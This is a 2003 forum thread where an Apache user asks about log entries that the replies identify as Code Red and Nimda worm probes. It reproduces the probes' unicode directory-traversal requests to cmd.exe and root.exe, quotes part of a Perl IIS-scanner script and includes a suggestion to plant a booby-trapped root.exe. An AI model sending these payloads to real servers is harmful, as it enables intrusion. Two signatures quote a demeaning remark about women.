|
-
November 18th, 2003, 03:32 PM
#1
Junior Member
 Apache under attack from IIS server?
I'm running a little old computer with apache, and I keep getting some very intresting logs in the Apache access.log file...
[ip] - - [18/11/03:12:36:11 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 294
[ip] - - [18/11/03:12:36:11 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
[ip] - - [18/11/03:12:36:11 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
[ip] - - [18/11/03:12:36:11 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
[ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
[ip] - - [18/11/03:12:36:12 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
[ip] - - [18/11/03:12:36:12 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
[ip] - - [18/11/03:12:36:12 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
[ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 303
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
[ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
[ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
Thankfully all are 404 or 400'ed, but Im worried that its doing more than just that. Im actualy worried that its in the system. Im behind two firewalls [software and hardware], but I still feel insecure about it. I want to run the Apache though because I host a few documents off of it...
If anyone can tell me whats happning in those logs and what could be the attacking party, it would help, because this shows up alot in my logs! 
Thanks for your time in reading this;
NeoThermic
-
November 18th, 2003, 03:44 PM
#2
It's a worm.
Or several worms.
It's perfectly normal, and happens to all Apache servers on the web all the time. You can safely ignore it
Slarty
-
November 18th, 2003, 03:47 PM
#3
Junior Member
Hmm... so what are they after? There is no root.exe on my computer...
NeoThermic
-
November 18th, 2003, 03:51 PM
#4
As slarty says, its probably a worm, so they are not after you specifically. The worm is searching for any vulnerable computer.
-
November 18th, 2003, 03:55 PM
#5
Originally posted here by NeoThermic
Hmm... so what are they after? There is no root.exe on my computer...
NeoThermic
They are after any machine that has the following conditions met:
a) port 80 open
b) running IIS
c) vulnerable version of IIS
Since you only meet one condition, then you're not going to be affected. It's likely one of the following types of worms/scanner (which a quick visit to Google will help you with info on them):
Code Red
Code Red II
nimda
Transversal Directory worm (new?)
Trasversal Directory scanner
-
November 18th, 2003, 04:08 PM
#6
unpatched iis servers are vulnerable to a directory transversal using unicode (..%c1%9c ). these worms, the most common are the code red varity, dont bother to check if your running iis or not. they just run their scripts. you can expect to see this many more time. its pittiful how many people dont patch their machines but for you it really is nothing for you to worry about.
root.exe is nothing more than cmd.exe renamed and placed in a web directory that executables are allowed to run in to make it easier to break into latter on
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
November 18th, 2003, 07:07 PM
#7
Senior Member
and again...this is no worm,just an iis-scanner looking for the unicode hole or even cracked iis.
(copy of cmd.exe ->root.exe to bypass the output restrictions)
well, i think i've got a deja vu ?
-
November 19th, 2003, 01:35 AM
#8
Fun littel game is to create a root.exe file in the requested directory. Now they will execute that file I am sure if you control what it dose on execution you can have a lot of fun with it.
Who is more trustworthy then all of the gurus or Buddha’s?
-
November 19th, 2003, 06:31 AM
#9
stranger i have to disagree. codered doesnt check for an iis string while most automated tools do and if you mean some sk just scanning a broad range of ips not checking i think the number of infected servers is far greater than kiddies doing that (although i could be wrong. im makeing this judgement based on people i know):
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
# Server string subroutine.
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\nTrying to obtain IIS Server string ...";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
$output = $results[$X];
if (defined $output){
if ($output =~/IIS/){ $webserver = "iis" };
};
};
if ($webserver ne "iis"){
print "\a\a\n\nWARNING : UNABLE TO GET IIS SERVER STRING.";
print "\nThis Server may not be running Micro\$oft IIS WebServer";
print "\nand therefore may not be exploitable using the";
print "\nUnicode Bug.";
print "\n\n\nDo You Wish To Cont ... [Y/N]";
my $choice = <STDIN>;
chomp $choice;
if ($choice =~/N/i) {&exit};
}else{
print "\n\nOK ... It Seems To Be Micro\$oft IIS.";
};
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
although the GET reguests are identical line for line
http://isp-lists.isp-planet.com/isp-.../msg00005.html
and from http://cis.tamu.edu/security/microsoft/Nimda.html
DETAILS OF IIS PROPAGATION:
A short example of the IIS probes launched by the worm is shown below. These logs were captured by an Apache web server. Note that the pattern repeats itself; some reports indicate that the 16-probe sequence will be repeated against a single target as many as 13 times. Note that the first two attacks show the worm attempting to exploit the root.exe backdoor left by Code Red II or possibly Sadmind infections. The next set of two attacks are also targeting Code Red II backdoors where the root C: and D: drives are mapped to IIS virtual folders, allowing access to cmd.exe.
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-""-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-""-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-""-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-""-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"404 232"-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/
c+dir HTTP/1.0" 404 249 "-" "-"
etc, etc.
it's deja vu all over again...Yogi Berra
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
November 21st, 2003, 11:39 AM
#10
Senior Member
@tedob you are right ...i checked my apache logs and on getting scanned there were lot more tryouts.
aaah...there it is: http://www.antionline.com/showthread...hreadid=250942
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
Reply With Quote
